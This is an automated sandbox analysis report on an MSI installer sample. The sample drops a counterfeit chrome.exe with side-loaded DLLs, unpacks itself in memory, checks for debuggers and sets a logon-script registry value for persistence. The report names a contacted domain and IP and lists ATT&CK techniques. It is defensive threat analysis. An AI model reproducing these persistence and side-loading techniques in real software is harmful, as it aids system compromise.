Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: security.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: security.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: security.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: secur32.dllJump to behavior
Source: nf963-5d-qns6-w812.msiStatic file information: File size 27090432 > 1048576
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release\initialexe\chrome.exe.pdb source: chrome.exe, 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000003.00000000.1740214188.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000000.1758151655.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000002.1775306511.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000000.1774187268.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000002.1788091642.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000000.1784911644.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000002.1799707276.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000002.1811641793.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000000.1798792150.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeUnpacked PE file: 4.2.chrome.exe.400000.0.unpack
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeUnpacked PE file: 5.2.chrome.exe.400000.0.unpack
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeUnpacked PE file: 7.2.chrome.exe.400000.0.unpack
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D39990 LoadLibraryW,GetProcAddress,3_2_00D39990
Source: initial sampleStatic PE information: section where entry point is pointing to: .p}\
Source: MpClient.dll.1.drStatic PE information: section name: .didata
Source: MpClient.dll.1.drStatic PE information: section name: .debug
Source: chrome.exe.2.drStatic PE information: section name: CPADinfo
Source: chrome.exe.2.drStatic PE information: section name: malloc_h
Source: chrome_elf.dll.2.drStatic PE information: section name: .didata
Source: chrome_elf.dll.2.drStatic PE information: section name: .O%.
Source: chrome_elf.dll.2.drStatic PE information: section name: .9Xc
Source: chrome_elf.dll.2.drStatic PE information: section name: .debug
Source: chrome_elf.dll.2.drStatic PE information: section name: .CE3
Source: chrome_elf.dll.2.drStatic PE information: section name: .l`q
Source: chrome_elf.dll.2.drStatic PE information: section name: .p}\
Source: vulkan-1.dll.2.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.2.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.2.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E29F3B push ecx; ret 3_2_00E29F4E
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0EA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE243.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome_elf.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE00F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\AplicationTool\MpClient.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE42A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3AC.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\Chrome\Application\118.0.5993.120\vulkan-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0EA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE243.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE00F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE42A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3AC.tmpJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey value created or modified: HKEY_CURRENT_USER\Environment UserInitMprLogonScriptJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C191415
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6BD16BF9
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C1B95AB
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C2169BD
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6BC8A281
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C3FD029
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C1DCC5C
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C46D380
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6BD42816
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C31B7CB
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C1F0F6C
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C4679C2
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C3C7DFA
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C2D53E1
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C1EB3AC
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C1ED6AC
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C2CA127
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C21FD61
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C464AB4
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C22AD67
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C429722
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C31EEA7
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C1F91ED
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6BC46829
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C3CDE5F
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C3CAF0A
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6BC83380
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C2249F9
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C19FE81
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C1B7857
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI/Special instruction interceptor: Address: 6C22223D
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D3CFF0 rdtsc 3_2_00D3CFF0
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE0EA.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\Chrome\Application\118.0.5993.120\chrome_elf.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE243.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE00F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE42A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\AplicationTool\MpClient.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE3AC.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\Chrome\Application\118.0.5993.120\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeAPI coverage: 2.3 %
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D38030 GetModuleHandleExW,GetLastError,SetLastError,GetLastError,SetLastError,GetCurrentProcess,K32GetModuleInformation,GetLastError,SetLastError,GetLastError,SetLastError,GetSystemInfo,GetLastError,FreeLibrary,FreeLibrary,FreeLibrary,3_2_00D38030
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D3CFF0 rdtsc 3_2_00D3CFF0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D31F90 GetCurrentThread,IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetCurrentThreadId,3_2_00D31F90
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D391A0 GetLastError,SetLastError,SetLastError,OutputDebugStringA,WriteFile,3_2_00D391A0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D39990 LoadLibraryW,GetProcAddress,3_2_00D39990
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E29D48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00E29D48
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E44F36 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E44F36
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
Source: chrome.exe, 00000003.00000002.1761827563.000000006B42B000.00000002.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776863934.000000006B42B000.00000002.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792241667.000000006B42B000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: @Winapi@Windows@DOF_PROGMAN
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D49620 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,LocalFree,CreateNamedPipeW,SetLastError,3_2_00D49620
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E2A255 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00E2A255
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF3B10 GetVersionExW,GetProductInfo,GetNativeSystemInfo,3_2_00DF3B10
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
2
Command and Scripting Interpreter
1
Registry Run Keys / Startup Folder
13
Process Injection
21
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
13
Process Injection
Security Account Manager13
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Extra Window Memory Injection
1
Deobfuscate/Decode Files or Information
NTDS2
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets11
Peripheral Device Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials116
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
File Deletion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Extra Window Memory Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1498175 Sample: nf963-5d-qns6-w812.msi Startdate: 23/08/2024 Architecture: WINDOWS Score: 72 58 www.google.com 2->58 60 www.fuhnwijude.com 2->60 62 4 other IPs or domains 2->62 66 Machine Learning detection for dropped file 2->66 68 PE file contains section with special chars 2->68 70 AI detected suspicious sample 2->70 13 msiexec.exe 18 43 2->13         started        16 msiexec.exe 2 2->16         started        signatures3 process4 file5 44 C:\Windows\Installer\MSIE42A.tmp, PE32 13->44 dropped 46 C:\Windows\Installer\MSIE3AC.tmp, PE32 13->46 dropped 48 C:\Windows\Installer\MSIE243.tmp, PE32 13->48 dropped 50 3 other malicious files 13->50 dropped 18 msiexec.exe 146 13->18         started        process6 file7 36 C:\Users\user\Chrome\...\vulkan-1.dll, PE32+ 18->36 dropped 38 C:\Users\user\Chrome\...\chrome_elf.dll, PE32 18->38 dropped 40 C:\Users\user\Chrome\...\chrome.exe, PE32 18->40 dropped 42 2 other malicious files 18->42 dropped 21 chrome.exe 18->21         started        process8 signatures9 72 Detected unpacking (creates a PE file in dynamic memory) 21->72 74 Switches to a custom stack to bypass stack traces 21->74 76 Queries Google from non browser process on port 80 21->76 24 chrome.exe 21->24         started        process10 process11 26 chrome.exe 24->26         started        process12 28 chrome.exe 26->28         started        process13 30 chrome.exe 28->30         started        process14 32 chrome.exe 3 1 30->32         started        dnsIp15 52 fuhnwijude.com 198.20.110.106, 443, 49734 SINGLEHOP-LLCUS United States 32->52 54 google.com 142.250.185.78, 49737, 80 GOOGLEUS United States 32->54 56 3 other IPs or domains 32->56 64 Creates an undocumented autostart registry key 32->64 signatures16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
SourceDetectionScannerLabelLink
C:\Users\user\Chrome\Application\118.0.5993.120\chrome_elf.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\AplicationTool\MpClient.dll0%ReversingLabs
C:\Users\user\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.140%ReversingLabs
C:\Users\user\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.500%ReversingLabs
C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe0%ReversingLabs
C:\Users\user\Chrome\Application\118.0.5993.120\vulkan-1.dll0%ReversingLabs
C:\Windows\Installer\MSIE00F.tmp0%ReversingLabs
C:\Windows\Installer\MSIE0EA.tmp0%ReversingLabs
C:\Windows\Installer\MSIE243.tmp0%ReversingLabs
C:\Windows\Installer\MSIE3AC.tmp0%ReversingLabs
C:\Windows\Installer\MSIE42A.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://crashpad.chromium.org/0%URL Reputationsafe
https://crashpad.chromium.org/bug/new0%URL Reputationsafe
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new0%URL Reputationsafe
https://codewith.it/p/zNgG4G0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf0%Avira URL Cloudsafe
https://ipinfo.io/missingauth0%Avira URL Cloudsafe
